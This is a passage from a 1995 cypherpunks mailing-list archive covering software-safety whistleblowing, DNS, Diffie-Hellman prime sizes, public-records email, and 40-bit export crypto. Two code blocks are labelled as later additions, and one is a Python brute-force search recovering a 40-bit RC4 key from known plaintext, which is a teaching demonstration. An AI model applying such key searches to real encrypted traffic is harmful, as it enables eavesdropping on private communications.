> English language piece reaches a wide international audience. 
> 
> The Canadian Broadcasting Corporation is a Crown Corporation which has
> historically received its primary funding from the Government of Canada. 
> Recently, it has suffered under the budgetary ax, and the push for
> privatization.  I'm pretty confident that the Corporation would copyright
> clear the clip for MPEG distribution across the Net, if they were
> approached with the concept that the clip was a demonstration of the CBC's
> journalistic excellence and integrity, a piece which is demonstrative of
> the critical need to continue their funding.  A concrete demonstration of
> the need for the CBC.  And a piece which could well receive deserved
> international acclaim. 
>
> The site would help them, and would simultaneously be a site of
> international public service. 
>
> Nothing will drive home the need for quality software, quality code, and
> quality security more than the vivid graphic pictures of the consequences
> of sloppy code, or of the risks if certain critical systems, LANs, or
> private networks are compromised, or if security and privacy (which are
> flip sides of the same coin) are ignored. 
>
> The sight of a body, that has had a hole burned straight through it from
> the front through to the spine is truly chilling and drives the message
> home.  Nothing seems to speak as clearly as a picture ... as to what the
> stakes are ... of what "bugs" in code do ... and of what a network
> compromise can leave in its wake. 
> 
> A picture of consequences.
> 
> Six people died in Canada and the United States due to the software flaw. 
> Even after numerous reports of the flaws, the company refused to even
> acknowledge the existence of a problem, and in fact did everything within
> its power to make sure doctors, radiologists and physicists were unaware. 
>
> The attitude of trivialization can only be characterized as fantastic, and
> would be unbelievable to anyone who has not viewed the piece. 
>
> It's one hell of a backgrounder which not only details problems, but looks
> at solutions -- it examines attitudes, especially management attitudes.  It
> truly deserves an expanded audience.  From teachers, to students, to the
> international media, to the concerned private individual, all will be
> served well if this piece gets wide attention. 
>
> Takers, anyone??

Now, how on earth, (after rereading what I wrote) did my words get
misunderstood??  And how on earth did someone figure that they needed to
establish a bi-directional communications channel with me?? 

I mean it's not like I'm attacking AT&T or Netscape, I'm simply trying to
coordinate a basic public service, and blow the whistle on bad code.

Blow the whistle on software which people expect (rightfully) to be
reliable ...  software which people expect (rightfully) not to cause any
human harm. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jolson@squeaky.free.org (jolson)
Date: Tue, 7 Nov 95 04:57:54 PST
To: cypherpunks@toad.com
Subject: Software development
Message-ID: <199511071301.HAA11964@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


Two suggestions for new product development
1.  Secure virtual disk drives for OS/2

2.  A combination of secure email server/client for public domain use such 
    as this E-Mail list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 7 Nov 95 04:40:41 PST
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511071238.AA00909@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Sorry.  But still, the intent was to be user-friendly (right?), and
>a side effect was to make it possible to renumber without anyone noticing.

No.  DNS was created because the management of everyone editing and
downloading one huge file was just falling apart.  The Arpanet always
used names instead of numbers.  Moving hosts around was always possible.

CIDR doesn't affect the fact that if nntp.com switches, say, to BBN Planet
then I will have to get a new address.  CIDR just says you can route based
on smaller/larger granularity than IP Network Address classes.

>That's the connection between DNS and routing, and it's why using names
>instead of numbers is Good.

There is no connection.  Using names instead of numbers is good.  It
does bring up an interesting philosophical question about where the
True Name really is.  And how DNS must be part of your TCB unless/until
you have end-to-end mutual authentication.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 7 Nov 95 16:50:14 PST
To: cypherpunks@toad.com
Subject: Re:  forging headers (with more header information)
Message-ID: <199511080049.QAA23866@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Without having any access to anything but the headers, it looks like
>you are an employee for SGI and sent the message from there.
>
>Look at the last Received: header.  It went from sgi.com to mit.edu to
>well.com and then to you.

Obviously was forwarded from a remailer inside SGI ....

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hilarie Orman <ho@cs.arizona.edu>
Date: Tue, 7 Nov 95 18:14:26 PST
To: karn@qualcomm.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511080146.RAA22568@servo.qualcomm.com>
Message-ID: <9511080214.AA12812@uncial.CS.Arizona.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>  Well, since we already require 56-bit DES in ESP in the interests of
>  promoting basic interoperability, wouldn't a 512-bit prime be
>  similarly sufficient?

If you are willing to accept that in all likelihood, one year from
now, some group will announce that they can "crack" all key exchanges
using the published modulus, then sure, call it sufficient.  There is
certainly precedent; it was my understanding that Sun did not change
their SecureRPC modulus when informed of LaMacchia and Odlyzko's work.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Tue, 7 Nov 95 18:21:28 PST
To: Geoff Commons <COMMONS@psd.state.vt.us>
Subject: Electronic-reply issues
Message-ID: <199511080220.VAA14821@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


[Key Words: public records; privacy; encryption; archives;
Telecommunications Plan;]

November 7, 1995

Mr. Geoffrey Commons Esq.
Special Counsel
Vermont Department of Public Service
State Street
Montpelier, Vermont 05602

Dear Mr. Commons:

Thank you for your prompt reply to my document request.

Yes, I will accept your electronic correspondence as your 'written' reply.

However, this brings up several good points which I would ask that you
follow up on:
The receipt of an e-mail message does not, in and of itself, assure the
recipient of the message's authenticity, privacy or preservation.

On the authentication issue, it is well known that the message headers are
absolutely insufficient to authenticate the sender of a message. Digital
technologies, using encryption, are required here. Other issues are the
privacy of the message along its long path between your desk and my office,
and the record's later availability, _in electronic format_, if requested.

Regardless of the fact that we work only a thousand feet apart here in
Montpelier, this message has probably traversed, _in clear text_, through
Hartford CT., Albany NY., or Boston MA. prior to being exchanged between the
so called 'gov-net' and sover.net. Your reply has also probably been backed
up to a tape at the DPS, combined with other exempt public records dealing
with current regulatory litigation or consumer complaints. These storage
procedures, or lack thereof, could serve to impede future access to these
and other records by the public.

The original voice mail request and its written reply take on some form of
public records status where, by statute, records must be cataloged so as to
be locatable if requested, and archived for a certain period of time
pursuant to an approved records retention schedule. Those schedules are
approved by the director of public records, John Yacavoni.

It occurs to me that the DPS is required under the Vermont statutes
governing the preparation of a Ten Year Telecommunications Plan, to analyze
telecommunications  technologies and the implication of their use in both
the public and private arenas. The pertinent parts of the statute are
included here for your convenience.

*******************begin_included_document****************************
30 VSA 202d
                       *        *       *
        >(b)  The department, through the director, shall prepare a
telecommunications plan for the state.  The plan shall be for a 10 year
period and shall serve as a basis for state telecommunications policy.  The
plan shall include at a minimum:
>		(1)  an overview, looking ten years ahead, of statewide growth and
development as they relate to future requirements for telecommunications
services, including patterns of urban expansion, statewide and service area
economic growth, shifts in transportation modes, economic development,
technological advances and other trends and factors which, as determined by
the director, will significantly affect state telecommunications policy and
programs;
>		(2)  a survey of Vermont residents and businesses, conducted in
cooperation with the agency of development and community affairs, to
determine what telecommunications services are needed now and in the
succeeding ten years;
>		(3)  a study and evaluation of conversion to measured service as ordered
by the board;
>		(4)  an assessment of the current state telecommunications system and
evaluation of alternative proposals for upgrading the system to provide the
best available and affordable technology for use by government.
>	(c)  In developing the plan, the department shall take into account the
policies and goals of section 202c of this title, and the need for basic
service at affordable rates, improved competition among providers, the needs
of the state as user of telecommunications services, and future development
of the state.

*******************end_included_document***************************

It would then logically follow that a thorough analysis of these issues,
which are not created by, but are certainly complicated by
telecommunications technologies, should be included in the forthcoming Draft
of that plan. The department would then offer the citizens and the business
community an opportunity to recommend changes or elaboration on those draft
recommendations. These should include, but are not limited to the use of
digital signatures, authentication and encryption technologies, and last but
not least EDI or Electronic Document Interchange.

These technologies are relevant to the state as a whole as far as
positioning our citizens and businesses to participate in the rapidly
emerging era of electronic commerce (where absolute privacy protections are
essential), but are also immediately relevant to the gov-net/ school-net
implementation, and even to the workings of your Department of Public
Service and the quasi-judicial Public Service Board in order to enable
electronic filings, to expedite the backlog of dockets and to answer
official document requests.

As far as I know there is no other working group addressing these issues at
present. Possibly your 'written' reply to my public records request,
delivered via e-mail, will serve to catalyze such an effort in the context
of a PSB-DPS working group (open to the public, of course) or in one of the
amazingly effective forums in which your commissioner participates dealing
with telecommunications.

One more question: was the voice mail message which I delivered to you,
which certainly constitutes a record "created or acquired in the course of
agency business", retained, cataloged and archived? Or, if it was destroyed,
was it pursuant to an approved records retention schedule? I recall the
voice mail message to your Commissioner relating the Clyde River Dam
negotiations which prompted a headline story and wish to emphasize the
relevance of these new technologies and the management of public records.

I look forward to your thoughtful reply, or that of your Commissioner,
Richard Sedano.
Now aren't you glad you use e-mail?

Sincerely,

Stephen Whitaker
Design Access Network
P.O.Box 1331
Montpelier, Vermont 05601-1331

whitaker@sover.net



At 06:22 PM 11/7/95 EDT, you wrote:
>November 7, 1995
>
>Dear Mr. Whitaker:
>
>     I have today received your request (left on my voice mail 
>yesterday, 11/6) to inspect certain documents.  I understand your 
>request to be for access to all staff analyses and internal or 
>external correspondence regarding 9-1-1 costing or implementation, 
>prepared or received by the Department of Public Service during 
>calendar year 1995.  Please let me know if I have misunderstood your 
>message.
>
>     I have relayed your request to all DPS staff, and we are in the 
>process of collecting and reviewing responsive documents.  Due to the 
>length of time covered by your request, as well as its breadth, it will be 
>a few days before I can be sure that I have collected and reviewed all 
>responsive documents.  Therefore, pursuant to 1 V.S.A. sec. 
>318(a)(5)(B), I am advising you that I expect to make the requested 
>documents available no later than Tuesday, November 14.  If I can 
>make them available earlier, or if unexpected delays are encountered, 
>I will let you know.  Otherwise, you may inspect the documents at the 
>DPS, 112 State Street, Montpelier on November 14 as provided by 
>statute.
>
>     Since you requested my reply by e-mail, I am assuming that this 
>message will suffice as "written notice" under the Access to Public 
>Records law.  Please let me know if you would prefer a response by 
>ordinary mail.
>
>     Thank you for your inquiry and continuing interest in these 
>matters.
>                                                           Sincerely,
>
>                                          Geoffrey Commons, Special Counsel
>

Stephen Whitaker	

///////////////////////////////////////////////////////////////////////

     _/_/_/              _/_/             _/      _/
    _/    _/           _/   _/           _/_/    _/
   _/     _/         _/_/_/_/           _/  _/  _/
  _/    _/          _/    _/           _/    _/_/
 _/_/_/   ESIGN    _/    _/ CCESS     _/      _/ ETWORK

///////////////////////////////////////////////////////////////////////

Design Access Network		   	 802.479.6118
Post Office Box 1331  			 whitaker@sover.net     		
Montpelier, Vermont     05601-1331	 PGP public key available





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 8 Nov 95 01:54:48 PST
To: cypherpunks, gnu
Subject: Call For Papers - Conference on Redistributable Software
Message-ID: <9511080954.AA13883@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[I'm hoping that we can get some papers on freely redistributable
*crypto* and *security* software -- like PGP or PEM or SSL_eay or
Kerberos or brute-force tools or SATAN or Java tools or whatever!  I'm
on the program committee and am trying to make the conference as broad
as possible, not just focusing on "traditional" free software.  Help!
--gnu]

		CALL FOR PAPERS

	First Conference on Freely Redistributable Software

	Sponsored by the Free Software Foundation

		2-5 February 1996
		Cambridge, MA

Over the past 15 years, free and low-cost software has become ubiquitous.  
This conference will bring together implementors of several different types 
of freely redistributable software and publishers of such software (on 
various media).

There will be tutorials and refereed papers, as well as keynotes by
        Linus Torvalds and Richard Stallman

The Conference will be held at the Cambridge Center Marriott, 
2-5 February 1996.  

Papers are invited on any aspect of GNU, Linux, NetBSD, 386BSD, FreeBSD, 
expect, PERL, tcl/tk, and other tools for which the code is accessible 
and redistributable.

Extended abstracts are due on or before Thursday, 30 November 1995. 

Authors will be notified no later than 8 December.
Full papers will be due Thursday, 4 January 1996.

Program committee:
        Peter H. Salus, chair
        Robert J. Chassell
        Chris Demetriou
        John Gilmore
        Marshall Kirk McKusick
        Rich Morin
        Eric S. Raymond 
        Vernor Vinge

Abstracts of 350-750 words (in troff, PostScript, or straight ASCII, 
only) should be sent to
        conf96@gnu.ai.mit.edu
-- 
-----------------------------------------------------------
Peter H. Salus  #3303  4 Longfellow Place  Boston, MA 02114
	+1 617 723 3092
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 95 18:21:36 PST
To: cypherpunks@toad.com
Subject: Re: Market Value of Web Pages
Message-ID: <acc7f59c06021004e10b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:43 AM 11/10/95, Mark wrote:

(Description of a Web page earning $3,600,000 a year elided.)


>If you toss arguments like this at some of the sites that would be viable for
>the hit numbers and then explain the only way that will occur is if the crypto
>laws are repealed, you will create a lot more lobbiers annoying their reps
>for the cause. ecash without good crypto is like the Federal Reserve
>delivering cash with open pickup trucks. Or doing credit card purchases on
>postcards.

And if you make arguments that this is easy to do, and add that crypto laws
are stopping this from happening, you risk losing your credibility.

The current crypto export laws are a pain, but are not stopping these
"million hits a day" transactions. Recall that the 40 bits allowed in
Netscape for export took some non-trivial number of machine-hours to crack
(I'm talking about the brute force crack by Damien G. and others, not the
more recent exploitation of the RNG weakness). While this brute force crack
showed the limitations of the 40-bit key for certain transactions, it is
not a viable attack on a single transaction whose value is pennies.

As to the "$3.6 million a year," nice work if you can get it.

I fully expect some folks to make a lot of money. But beware the siren call
of make.money.fast...most people won't.

In any case, let's not claim that the lack of strong exportable crypto is
the reason these "Web millionaires" are not all around us. (Actually, a lot
of them are, but because their companies are doing so well, not because
their home pages are getting a million hits a day.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 10 Nov 95 19:01:29 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Diffie-Hellman in GF(2^n)?
Message-ID: <Pine.SUN.3.91.951110184600.19312B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Most Diffie-Hellman implementations currently use the multiplicative group
of prime fields.  However, the multiplicative group of finite fields of
characteristic 2 (GF(2^n)) can also be used and should be easier to
implement.  Is there any reason why they should not be used?  Does anyone
know the asymptotic running time of the best algorithm for calculating
discrete logarithms in GF(2^n)? 

Wei Dai
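
[Added example, not part of the original message: a Python sketch of Diffie-Hellman in the multiplicative group of GF(2^127), showing why the arithmetic is simple to implement (shifts and XORs, no carries). The reduction polynomial x^127 + x + 1, the generator x and all function names are choices made for this illustration; the 127-bit field is used because its group order 2^127 - 1 is prime, and it is far too small for real use.]

```python
import secrets

N = 127
MODULUS = (1 << N) | 0b11     # x^127 + x + 1, bit i = coefficient of x^i
ORDER = (1 << N) - 1          # size of the multiplicative group (a prime)
G = 0b10                      # the field element "x", used as generator


def gf_mul(a: int, b: int) -> int:
    """Multiply two field elements: shift-and-XOR with reduction mod MODULUS."""
    r = 0
    while b:
        if b & 1:
            r ^= a            # addition in characteristic 2 is XOR
        b >>= 1
        a <<= 1
        if a >> N:            # degree reached N: subtract (XOR) the modulus
            a ^= MODULUS
    return r


def gf_pow(a: int, e: int) -> int:
    """Square-and-multiply exponentiation in GF(2^N)."""
    result = 1
    while e:
        if e & 1:
            result = gf_mul(result, a)
        a = gf_mul(a, a)
        e >>= 1
    return result


def modulus_is_irreducible() -> bool:
    """For prime N, MODULUS is irreducible iff x^(2^N) == x modulo it."""
    t = G
    for _ in range(N):
        t = gf_mul(t, t)      # repeated squaring computes x^(2^N)
    return t == G


def valid_public(y: int) -> bool:
    """Reject 0, the identity 1, and anything that is not a reduced element."""
    return 1 < y < (1 << N)


def keypair():
    priv = 2 + secrets.randbelow(ORDER - 2)      # uniform in 2 .. ORDER-1
    return priv, gf_pow(G, priv)


def shared_secret(priv: int, peer_public: int) -> int:
    if not valid_public(peer_public):
        raise ValueError("invalid peer public value")
    return gf_pow(peer_public, priv)


if __name__ == "__main__":
    assert modulus_is_irreducible()
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    print(shared_secret(a_priv, b_pub) == shared_secret(b_priv, a_pub))
```

[Because the group order is prime, every element other than 0 and 1 generates the whole group, so the public-value check above is the only subgroup check needed in this field.]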




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 Nov 95 01:07:18 PST
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
Message-ID: <199511110908.BAA16272@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 AM 11/11/95 -0700, bryce@colorado.edu wrote:

>I don't really understand the use for "can't be opened until
>Christmas" tricks.  If you don't want anyone to see your info until
>Christmas then just don't give them a copy until then!  If you want
>to prove that you have it but not let them see it until later then
>do timestamping of hashes, zero-knowledge proofs and so forth.

For instance, suppose you want to give someone digicash on a certain day
(like a bond from your bank...)  Or leave a will, which nobody can hassle
you about while you're alive.  Or (as an extension of both) a trust that
can't be spent until some time certain in the future, like when you want
to pay Alcor to thaw your carcass out.

For the more realistic case, bonds, you want to be able to give them
the bond so they've got it in their hot little hands, but can't cheat by
spending it.  In a normal business relationship, where all the parties 
have names of some sort, this isn't so tough; it gets harder when 
some or all of you are pseudonyms...
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 Nov 95 01:07:22 PST
To: cypherpunks@toad.com
Subject: Re: Lotus Notes RSA Implementation Question
Message-ID: <199511110908.BAA16275@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:13 AM 11/11/95 GMT, bglassle@kaiwan.com wrote:
>>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
>>and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for
>>encryption in the exportable version and bigger keys for signatures in all
>>versions and for encryption in the USA version.
>
>I would assume since they are using a key size >40 bit, it is used for
>authentication only, not for data encrytion, that would skirt the ITAR
>regs.  If fact according to the docs, there is no data encryption when
>connecting to an international version server, regardless of the
>client version.

RSA keys get to have more bits than symmetric-key encryption, because they're
easier to crack and you typically use them for different things.
The permitted length seems to usually be 512 bits for RSA and 40 bits for
decent-quality symmetric cyphers (as opposed to easy-to-crack proprietary
cyphers, which may be longer if they're wimpy and the NSA's in a good mood.)
Your mileage may vary, of course. 

>My understanding was that the problems exposed with RC4 that you
>mentioned, were with the particular implementation by Netscape.  

There were two different problems found.  The first was a straightforward
brute-force crack on 40-bit RC4 (RC4 lets you choose key length...)
While it did have known plaintext near the beginning of the message,
having it _anywhere_ makes it crackable, with a bit more work.
The second problem was a Netscape-specific use of low-quality random
numbers to pick the RC4 keys.  But the first crack was the real thing.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
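
The known-plaintext key search described in the message above, as an added example that is not part of the original post. The key, the message and the search window are constructed: the upper 28 bits of the 40-bit key are treated as known so the loop finishes in about a second, and `worst_case_days` scales the same loop to the full 40 bits at an assumed trial rate.

```python
def rc4_keystream(key: bytes, n: int) -> bytes:
    """Return the first n bytes of RC4 keystream for key."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                        # output generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt data (the operation is its own inverse)."""
    return bytes(d ^ k for d, k in zip(data, rc4_keystream(key, len(data))))


def recover_key(ciphertext, known, offset, key_high, unknown_bits):
    """Try every value of the unknown low bits of a 40-bit key.

    known is plaintext the searcher expects at byte position offset.
    Ciphertext XOR known plaintext gives the keystream bytes at that
    position; a candidate key is accepted when it reproduces them.
    """
    target = bytes(c ^ p for c, p in
                   zip(ciphertext[offset:offset + len(known)], known))
    need = offset + len(known)   # known text deeper in costs more per trial
    hits = []
    for low in range(1 << unknown_bits):
        key = ((key_high << unknown_bits) | low).to_bytes(5, "big")
        if rc4_keystream(key, need)[offset:] == target:
            hits.append(key)
    return hits


def worst_case_days(trials_per_second: float, key_bits: int = 40) -> float:
    """Days to sweep the whole keyspace at a given (assumed) trial rate."""
    return (1 << key_bits) / trials_per_second / 86400


# Constructed sample data: a 40-bit key and a message whose protocol
# boilerplate ("HTTP/1.0") sits well past the first byte.
SECRET = 0x5A17C3B2E9
MESSAGE = b"POST /cgi-bin/order?item=4471 HTTP/1.0\r\n"
KNOWN = b"HTTP/1.0"
OFFSET = MESSAGE.index(KNOWN)
CIPHERTEXT = rc4(SECRET.to_bytes(5, "big"), MESSAGE)


def demo():
    """Search the low 12 bits; the upper 28 are given to keep this short."""
    return recover_key(CIPHERTEXT, KNOWN, OFFSET, SECRET >> 12, 12)


if __name__ == "__main__":
    for key in demo():
        print("key", key.hex(), "->", rc4(key, CIPHERTEXT))
    print("full 40-bit sweep at 1e6 trials/s: %.1f days" % worst_case_days(1e6))
```

The only cost of the known text sitting at byte 30 rather than byte 0 is the extra keystream generated per trial; the number of trials is unchanged.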






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Sat, 11 Nov 95 02:00:08 PST
To: cypherpunks@toad.com
Subject: RadioMail and chaining remailers
Message-ID: <199511110954.BAA25548@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hello All,

I am planning to purchase a HP200LX with a wireless modem with the 
RadioMail system. My question is: does the RadioMail software allow
chaining of messages for remailers? Are there other crypto applications
for the HP200LX?

Thanks in advance!

Liam






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas Junker" <tjunker@phoenix.phoenix.net>
Date: Sat, 11 Nov 95 01:04:46 PST
To: cypherpunks@toad.com
Subject: Re: the revolution of microcurrency
Message-ID: <199511110904.DAA12059@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Nov 95 at 15:47, Vladimir Z. Nuri <vznuri@netcom.com> 
wrote:

> Subject:       the revolution of microcurrency

> the topic of "microcurrency" has come up on this list
> ...<snip>
> touting it as a revolutionary change in the economy. I
> ...<snip>
> agree with this wholeheartedly. the possibility that
> people can
> ...<snip>
> will all contribute to a REVOLUTIONARY effect on culture.

> my key idea on all of this is that the whole idea of
> copyright is going to melt when you introduce cash, not
> be strengthened. 

I don't think so.

> there are a lot of people out there who
> think that one has to try to put a lock and chain on web
> pages or whatever that one is "selling", and the
> horrible problem of the net is that anything can be
> copied. and these people are feverishly working on
> specious "solutions" to this "problem" right now.

What's happening is that while some people try to impose
book and magazine notions onto the Web, others gleefully
splatter the landscape with everything from the interesting
to the awful but are generally stopped short of making a
living at it by the absence of workable means of asking for
and receiving nominal sums.  

Meanwhile, some other people are realizing that today's
$30/yr newsletter of 20,000 circulation will become
tomorrow's 25-cent-per-copy newsletter of 2 or 3 hundred
thousand "circulation," making more total money and
reaching and influencing far more people. A much larger
volume of information will be worth a penny or less for a
peek.  When those transactions become close to transparent
and of unnoticeable latency, *then* we will see the
explosion that will put present Web growth into
perspective as the baby crawl that it is.

This doesn't amount to putting locks and chains on Web 
pages any more than newsstands put locks and chains on 
newspapers or magazines.  When it's cheap enough and the 
transaction is a no-brainer, the buyer gets easy access 
while the publisher has reason to be there publishing, and 
neither worries too much about the value of the single 
copy.

> says, "you have to protect what you are selling from
> other people or you won't make any money". this theme

No, the point is that you have to have a way of making 
something or you won't have any incentive to generate the 
information or make it available to others.  The news for 
today is that the way of making something on small amounts 
of low-value information is almost at hand.

> I submit that things like the release of public domain
> standards and products like Java and Netscape for free
> are not merely blips at this moment but increasingly are
> going to be the marketing plan of the future. the idea is
> that you give away your product for FREE, 

Standards are not the product.  Standards are what help
make a market possible for products that must interface
with other products.  The closed-system people may have 
seen this in the momentary light of their extinction.

> and then people pay you if they like it. 

Don't hold your breath.

> this new ideology will be relevant to products that are
> not "things" but in fact are more in the realm of
> intellectual property, i.e. writing, software,
> cyberspace web pages, etc.

Intellectual property is not new.  What's new are
distribution and fee collection systems with the potential
for incremental costs approaching zero.  Most of the
infrastructure for that is in place, in fact has been in
place for quite a few years.  What has been missing has 
been the critical mass of users actually participating, and 
near-zero cost payment mechanisms.  I'm spectacularly 
disappointed by the initial ecash and payment offerings, 
since they seem to miss the whole point and be aimed at 
web-transacted business no different than the high-overhead 
transactions that take place face-to-face in retail stores 
and by phone and mail.

> the beauty of this system is that NO LONGER is
> "unauthorized distribution" the "enemy". it is your
> FRIEND, a key aspect of profit!!

Freely-distributable shareware has been around for 10-15 
years, and has grown from being the computer field's butt 
for bad jokes to a maturing distribution methodology that 
supports an increasing number of author/publishers offering 
some quite substantial and solid products.  It did this, 
by the way, without substantial benefit or contribution 
from the Internet or the Web.

> product to "authorized users". (i.e. those who pay in
> advance). our entire society thinks within this paradigm,

A big part of what is happening with microtransaction
evolution is that the buyer will be able to consider,
decide, and pay, all in the space of a second.  You can
forget about anything based on paying in "advance," and
all those draconian mechanisms -- they won't exist because
they won't need to exist.  Instant payment at very low
prices collapses whole ranges of problems that no longer
need be addressed.

> a rather extraordinary new economy can replace this,
> that of voluntary payment. 

We have "voluntary payment" now in most transactions not
involving the government.

> you DISDAIN things like copyright, because they prevent
> your "product" from reaching the eyes of potential
> customers. your goal is actually to distribute the
> product as far as possible, in a sort of pyramid-like
> scheme. you want your "customers" to distribute your
> product to their friends, so that those "friends"
> potentially become customers in an endless cycle.

You don't actually collect anything, though.  I guess you 
make it up in volume, right?

> this approach works amazingly with writing. imagine that
> if John Markoff suddenly QUIT the NYT and just wrote
> articles on his own. and imagine that at the bottom, you
> see a message, "for more of the same, send .5c or more to
> markoff@liberated.com". I submit that in the future,
> Markoff will probably be able to make more money than he
> does at NYT, because he is eliminating the middleman. the
> newspaper company is primarily built as a *distribution*
> channel. suddenly he doesn't have to pay anything out of
> his own salary, so to speak, for distribution.
> distribution is *free*. he doesn't require anyone else
> to do it for him. he puts his article in an appropriate
> place on the net and it circulates like a VIRUS if it is
> well received. the more people that see the article, the
> more people that pay him money.

You've got *part* of an idea here, but it's mixed up with
another idea.  It is already common for people with
service or product to sell to offer "free" information in
the form of articles, papers, small utilities, demos that
may actually have some use, and occasionally, fully
functional products.  In the field of intellectual
property in the electronic age, the incremental cost of a
copy approaches zero, so there is no great investment in
doing this.  There is, however, always something larger
FOR SALE, something that is being promoted by the
favorable exposure.  What is being given away is not the
final product one hopes to sell -- it is a loss leader,
something that in the field of information costs precious
little to run off.

> in an information system, individual objects have no
> value. what has value is the FLOW of quality information.
> if Markoff continues to flow with that good information,
> people will continue to pay for it. they will perceive
> that "by paying him, the quality information flow from
> him to me continues or increases".

People as marketplace players do not think like that.

> this same idea works with software. you don't see
> software as an end product. you see it as something that
> is evolving over time. and whenever you send money to a
> company for software, in this new system the idea is that
> "I like this software, and I want to see it grow. here
> is my contribution to that".

People as marketplace players do not think like that.  

The way some of them *may* think is, "I like this product;
it will evolve; my payment for a $1 license today entitles
me to new versions for a year; so this is a Smart Move."
<click!>

Also: "I like this digest article.  I like the way this 
author thinks and expresses himself.  It's a no-brainer to 
pay 20 cents for a copy of his full newsletter."  <click!>

> another interesting area is that of patents, and I see
> this dissolving in the same way. a patent is like trying
> to put a lock on an idea. but gradually people will
> realize, only ideas that are implemented have any value.
> you can't profit and lock an idea at the same time.

"Lock" and "no value" are not how patent is generally
viewed.  Xerox, Polaroid, IBM, Dow, duPont, et al would be
amused at your view.

> *dissemination* of ideas is what leads to profit, not
> locking them up.

You first.  Dissemination of *something* leads to exposure, 
establishment of credibility, *reputation*, in a word.  
That, in turn, gets you in the door for actual sales, 
whether of yourself, your funding proposal, or your actual 
product or service.  *That*, in turn, *may* lead to 
profits, assuming you have a whole bunch of other ducks in 
a row and manage your business well.

> hence there will be an economic incentive to an inventor
> to give away his ideas for free, at first. 

Yep, yep, I'm sold, just show me where to dump all these 
great ideas so I can get rich, quick.

> in the old system, where one thinks of an idea as a
> "thing", this sounds preposterous. 

Uh, um, in a word, "Yes."

> but in a new culture where ideas are seen as things that
> need to be cultivated and grown to work, it will seem
> eminently sensible. the inventor is releasing his idea to
> the world, saying "I can expand on this idea, even turn
> it into a reality, if you send me money". 

It was late, right?  You'd been up for a long time, right?  
You were getting the aching-back, numb-fingered madrugada 
sillies, right?  You mailed this in the afternoon because 
you'd slept it off by then and forgotten what you'd written, 
right?

> other people can of course steal the idea, but
> there is no value in the idea itself: 

No, of course not!

> the value is in the development of it 

Which only the originator can do, of course.

> into evolved new states, or the intellectual expertise of
> the inventor.

Yeah, history really shows this to be an effective 
principle on which to peg the survival of inventors.

> in short, microcurrency could have quite a liberating
> and revolutionary effect on economics as we know it. 

Yep.  Liberating it clear away from planet Earth.  
Revolutionary, as in, "orbital."

> in the current system, people are not paid for tiny
> contributions to the whole. the contributions have to be
